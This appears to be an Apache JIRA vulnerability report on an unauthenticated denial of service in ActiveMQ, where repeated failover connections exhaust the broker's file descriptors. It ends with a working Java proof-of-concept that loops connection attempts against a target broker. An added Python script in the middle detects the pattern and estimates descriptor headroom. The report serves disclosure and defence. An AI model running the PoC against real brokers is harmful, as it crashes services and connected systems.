ActiveMQ failover Denial of Service
-----------------------------------

                 Key: AMQ-3294
                 URL: https://issues.apache.org/jira/browse/AMQ-3294
             Project: ActiveMQ
          Issue Type: Bug
          Components: Broker
    Affects Versions: 5.5.0, 5.2.0
         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions

            Reporter: Luca Carettoni


Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger 
a Denial of Service condition against the broker service. 

In detail, an attacker can issue multiple ActiveMQ openwire connection requests 
using the following connection string: 
failover:tcp://<IP>:61616

Due to the 'failover' mechanism, all TCP connections remain active even if a 
valid session is not created. 
Please note that no valid credentials have been used. 

After a few thousand requests, a "java.net.SocketException: Too many open 
files" exception is triggered, causing the broker to freeze or crash. Connected 
systems may crash as well. 

During my test, the attack took around 4 minutes (in a local network) and it is 
highly reliable. This is most likely an abuse of the 'failover' functionality.

I've been testing version 5.2.0 and also the latest 5.5.0 release. As both 
releases are affected, I assume that this issue is present in other versions as 
well. The problem appears in the default configuration as well as with 
different authentication plugins enabled.
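The resource being exhausted here is the broker's file-descriptor table, and the symptom on the host is a single peer holding an unusual number of established connections to port 61616 while never completing a session. The following script is an added example (not part of the JIRA report or of the ActiveMQ project) showing how a defender can detect that pattern from `ss -tn` style output and estimate how much headroom remains before the "Too many open files" failure. The sample output, the per-peer threshold of 50 and the 64 reserved descriptors are constructed values for illustration.

```python
"""Count OpenWire TCP connections per client and estimate descriptor headroom.

Added detection example; not code from the JIRA report or from ActiveMQ.
Parses `ss -tn` style lines (constructed sample below), flags peers that hold
many connections to the broker port, and computes how many descriptors remain
before the broker process would hit "Too many open files".
"""
import re
from collections import Counter

BROKER_PORT = 61616  # OpenWire transport port named in the report

# `ss -tn` columns: State Recv-Q Send-Q Local:Port Peer:Port
SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<local>\S+):(?P<lport>\d+)\s+(?P<peer>\S+):(?P<pport>\d+)\s*$"
)


def connections_per_peer(ss_output, port=BROKER_PORT):
    """Return a Counter of peer address -> ESTAB connections to `port`."""
    counts = Counter()
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue  # header line or a format we do not recognise
        if m.group("state") != "ESTAB" or int(m.group("lport")) != port:
            continue  # ignore closing sockets and other listeners (e.g. web console)
        counts[m.group("peer")] += 1
    return counts


def flag_peers(counts, per_peer_threshold=50):
    """Peers holding more than `per_peer_threshold` connections.
    The threshold is an assumed tuning value; size it to legitimate client pools."""
    return sorted(peer for peer, n in counts.items() if n > per_peer_threshold)


def fd_headroom(total_connections, fd_soft_limit, reserved_fds=64):
    """Descriptors left before the broker reaches its soft limit (ulimit -n).
    `reserved_fds` approximates non-socket descriptors (jars, logs); an assumption."""
    return fd_soft_limit - reserved_fds - total_connections


# Constructed sample: one peer with 120 idle connections, one normal client.
SAMPLE_SS = "State Recv-Q Send-Q Local Address:Port Peer Address:Port\n"
SAMPLE_SS += "".join(
    f"ESTAB 0 0 10.0.0.5:61616 10.0.0.99:{40000 + i}\n" for i in range(120)
)
SAMPLE_SS += "ESTAB 0 0 10.0.0.5:61616 10.0.0.7:51234\n"
SAMPLE_SS += "ESTAB 0 0 10.0.0.5:8161 10.0.0.7:51235\n"      # web console, not OpenWire
SAMPLE_SS += "TIME-WAIT 0 0 10.0.0.5:61616 10.0.0.7:51236\n"  # not established

if __name__ == "__main__":
    counts = connections_per_peer(SAMPLE_SS)
    print("connections per peer:", dict(counts))
    print("flagged peers:", flag_peers(counts))
    print("fd headroom at ulimit 1024:", fd_headroom(sum(counts.values()), 1024))
```

On a real host, feed the script the output of `ss -tn` for the broker user and compare the total against the broker process's soft descriptor limit; a low headroom value together with one flagged peer is the signature of this report. Beyond raising the descriptor limit, newer ActiveMQ releases let the transport connector cap concurrent connections (the `maximumConnections` URI option), which turns this exhaustion into a rejected connection rather than a broker crash.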

Proof-Of-Concept:

--------------------
package openwireclient;

import javax.jms.*;
import org.apache.activemq.ActiveMQConnectionFactory;

public class GoAndCrash {

    private static String url = "failover:tcp://";

    public static void main(String[] args) throws JMSException {

        System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");

        url = url.concat(args[0] + ":" + args[1]);
        int cont = 0;

        while (true) {
            try {
                System.out.println("[*] Request #" + cont);
                ConnectionFactory connectionFactory =
                        new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
                Connection connection = connectionFactory.createConnection();
                cont++;
                connection.start();
            } catch (Exception ex) {
               //do nothing
            }
        }
    }
}
--------------------


--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira